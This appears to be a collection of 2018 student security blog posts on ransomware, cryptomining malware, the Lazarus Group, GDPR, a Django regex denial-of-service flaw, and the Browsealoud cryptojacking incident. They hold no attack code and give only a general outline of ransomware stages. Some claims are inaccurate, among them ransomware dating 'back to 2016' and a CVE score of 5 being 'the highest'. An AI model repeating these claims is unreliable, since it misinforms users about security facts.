Cryptocurrency mining malware, Ransomware, and who is at risk

By: Chase Alexander

9/11/2018

It is no secret that hackers are trying to gain something when they carry out an attack on a target, usually money. However the way that they do this can vary. It does not always mean that they are stealing credit card information, or bank account logins. Another way to exploit hacked targets is through cryptocurrency mining malware. There is also malware that takes over a system until a ransom is paid. Today I would like to look at three things. Ransomware, cryptocurrency mining malware, and who is at the greatest risk for these kinds of attacks.

First I am going to examine ransomware. This is an interesting case, as it has been around for quite some time now. The attack method dates all the way back to 2016. You would think that they would have been stopped by now, and you would be somewhat correct. Gone are the days of spreading ransomware through spam emails and outbreaks, where the philosophy was to cast a net as wide as possible and see what we catch. Today ransomware exists as a targeted attack on an individual or specific group. The goal of doing ransomware attacks this way is to carry out one strong attack, which will yield more reward then many weaker attacks. So how do they work? You gain entry into a system via weak Remote desktop protocol passwords. Escalate your privileges up to administrator. Use your new privileges to overcome security software. Spread your ransomware to encrypt files on the system. Finally leave a message with the ultimatum,” If you want your files to be decrypted, contact via email or dark web website.” And then you wait. If they pay the ransom, then mission success for the hacker. If they do not pay the ransom then it is almost inconsequential to the hacker. They will just move onto the next target and try again.

The other form of attack that is of interest is a cryptocurrency mining malware. What this attack does is take over a machine and use it to mine cryptocurrency for a hacker. This attack is very different because it requires no interaction between the hacker and the hacked. Unlike the previous method, this one allows the hacker to try and remain undetected. For ransomware, the hacked has the choice to either give up their machine and data, or give into the hacker. This method though gives no choice to the hacked. If they don’t hear their computer fan operating louder, then they will have no idea that they have been hacked. In addition to these facts, cryptocurrency is effectively an unregulated currency. This means that once the hacker has it, they are in the clear. If a hacker were to steal bank account credentials, there are still difficulties with actually attaining the currency inside of those bank accounts. A problem with this method however is that the profits are not immediate, they take time to incur. If ransomware is successful, then profits are made instantly.

So who is at risk for these attacks? Ransomware attacks are targeted attacks. They go after one group or individual. That group or individual will have to give up money in order to secure themselves. It is as simple as this; if you do not have money or credit, you are at a very low risk of this attack. The goal of ransomware is to get ransom. A hacker will go after someone who they know will be able to pay ransom. They are not going to go after the poor because they have very little to offer. A cryptomining attack however can happen to anybody. You don’t need any money or credit, if you have a computer it can be used for mining cryptocurrency. In terms of large targets we can look at Vietnam. Last year malware cost Vietnam 12.3 trillion VND or the equivalent of 540 million USD.

 

Sources:

  1. https://e.vnexpress.net/news/news/vietnam-vulnerable-as-new-cyber-security-threat-emerges-3804240.html
  2. https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
  3. https://www.zdnet.com/article/cryptocurrency-mining-malware-why-it-is-such-a-menace-and-where-its-going-next/

Connections with the Lazarus group and North Korea

Just as of recent, Park Jin Hyok was indicted by the United States. Hyok was indicted with charges of Conspiracy and Conspiracy to Commit Wire Fraud. While his sole indictment was nothing more than identifying a person who was partly responsible in some major cyber attacks around the world since 2014, it helped to start to draw a line between the Lazarus Group and the government of North Korea. Furthermore, his capture itself can lead to exposure of other members of the Larazus Group. To give a little background in what the Lazarus Group is capable of, it takes a bit of history into the atrocities they have committed. In 2014, there was a hack on Sony because of the controversial movie “The Interview”. Next, in 2016, there was a hack on the Bangladesh bank for $81 million. In 2017, the WannaCry which affected well over 250,000 hospitals, corporations, and government agencies in 150 countries within 3 days.

connection

But how could this one hacker from this group lead to the revelation of the sophisticated hacker group? While a huge email infrastructure is good for phishing and the perceived idea that things can be kept secret separate, it was a big reason that the US government were able to identify the vast email infrastructure. Well that and they got lucky because a purported supervisor sent a resume and sent how the “company was doing”, the company being Chosun Expo Joint Venture. Since revealing all the Gmail accounts, Eric Chien from Symantec Corp. has it on good authority that attacks from the Lazarus Group will undoubtedly come to a pause. While this is hardly anything close to being a closed case or bringing down an organization, it’s a spark that can light up the room of the shady Lazarus Group. vast_email_infrastructure

– Andres Orbe

Sources:

New Eurpoean Privacy Standards Comming into Effect

Two years ago the European Union passed the General Data Protection Regulation (GDPR), on May 25th these regulations become enforceable. The GDPR aims to increase the number of privacy controls users have on the web through new privacy standards. Although the regulations were specifically passed by the EU, due to the international nature of the web many people from all over the world will feel its impacts.

These regulations aim to increase user privacy through expanding the scope of consent that sites are required to request. First, consent has to be explicitly given for each specific use of data provided by a customer – meaning web services must implement gradual permission systems. The user must be told exactly what the data is being used for and has a right to access all the information the company has on the user. Companies must also have the ability to prove that consent was given for a particular use of data. Second, a user must be able to withdraw their consent at any time. Lastly, all users have the right to be forgotten. This final provision means that a user can request that any data associated with them to be permanently erased from a companies database.

It is unknown at this time how willing the EU will be to enforce these provisions. However, breaking any of these cars large penalties on per-violation bases. These rules could potentially change the global playfield as many advertising, social media, and other businesses that rely heavily on data collection will be massively affected.

https://www.theverge.com/2018/3/28/17172548/gdpr-compliance-requirements-privacy-notice

https://www.cnbc.com/2018/03/30/gdpr-everything-you-need-to-know.html

https://www.huntonprivacyblog.com/2017/12/15/article-29-working-party-publishes-guidance-on-consent-under-the-gdpr/

Sanitize your strings, kiddos

Trusting user inputted strings has always been a problem in computing. Users will always find a way to break your application with some kind of weird character. Programmers have found clever ways to get around this, such as preparing SQL statements, escaping unknown characters, or just returning an error when coming across unknown text. However, with the rise of the internet and the availability of tools, hackers have gotten smarter at the way they attack inputs.

In the last month of so, Django found this out in their django.utils.text.Truncator class. This class had two methods, chars() and words() which would attempt to clean input.

Well, for some reason, users wanted a way to clean HTML with these methods, so Django added a html keyword argument to the methods, which would attempt to clean the text as if it were HTML. However, due to a catastrophic backtracking vulnerability in a regular expression in those functions, malicious users could input complicated HTML that would take a long time to process. This would result in a DoS attack on the web server, and bring down services to other users. Uh-oh.

So, looking at the CVE, you can see the security community ranked it a 5, the highest rating. Needless to say, Django quickly patched the issue and launched a hot fix.

The moral of the story is that security vulnerabilities can happen to anyone, and you should know what the framework you are using is doing, instead of just blatantly trusting that it will work. Be aware of security in your everyday life.

— Kyle Kaniecki

Over 4,200 Websites Compromised with a Cryptominer

On Sunday February 11, 2018 a little over 4200 websites, including government websites from the U.K. and U.S, were compromised with a cryptominer.   Users that visited these sites were forced to mine a cryptocurrency called Monero through the compromised JavaScript library Browsealoud.  The library was modified to include Coinhive, a JavaScript based cyptominer specifically for mining Monero.

Browsealoud is a library developed by Texthelp that adds text-to-speech functionality to any website it’s added to. It is not clear how the Browsealoud library was modified, as it is hosted on an Amazon S3 bucket. The security of an S3 bucket is quite strong, so it is likely that the credentials to the bucket were obtained either through a leak or phishing.

There is no clear answer for what the public can do to prevent this from happening in the future. You could try using a script blocking extension, but if the site is already set to allow scripts, then this miner would have been allowed as well since it was embedded into the Browsealoud code.

Instead of being proactive and taking our security into our own hands, we are stuck depending on the developers of the websites we visit to start implementing subresource integrity (SRI). This method checks the hash of the script that is attempted to be loaded versus the hash of what the script should have and then blocks the script if it doesn’t match.  Current versions of Google Chrome, Mozilla Firefox, and Opera all support SRI by default, but not a lot of sites use it.

– Zachary Campanella

Sources:

https://www.databreachtoday.com/government-websites-deliver-cryptocurrency-mining-code-a-10643

https://www.theguardian.com/technology/2018/feb/11/government-websites-hit-by-cryptocurrency-mining-malware

https://www.engadget.com/2018/02/11/government-websites-victims-of-cryptocurrency-mining-hijack/

https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity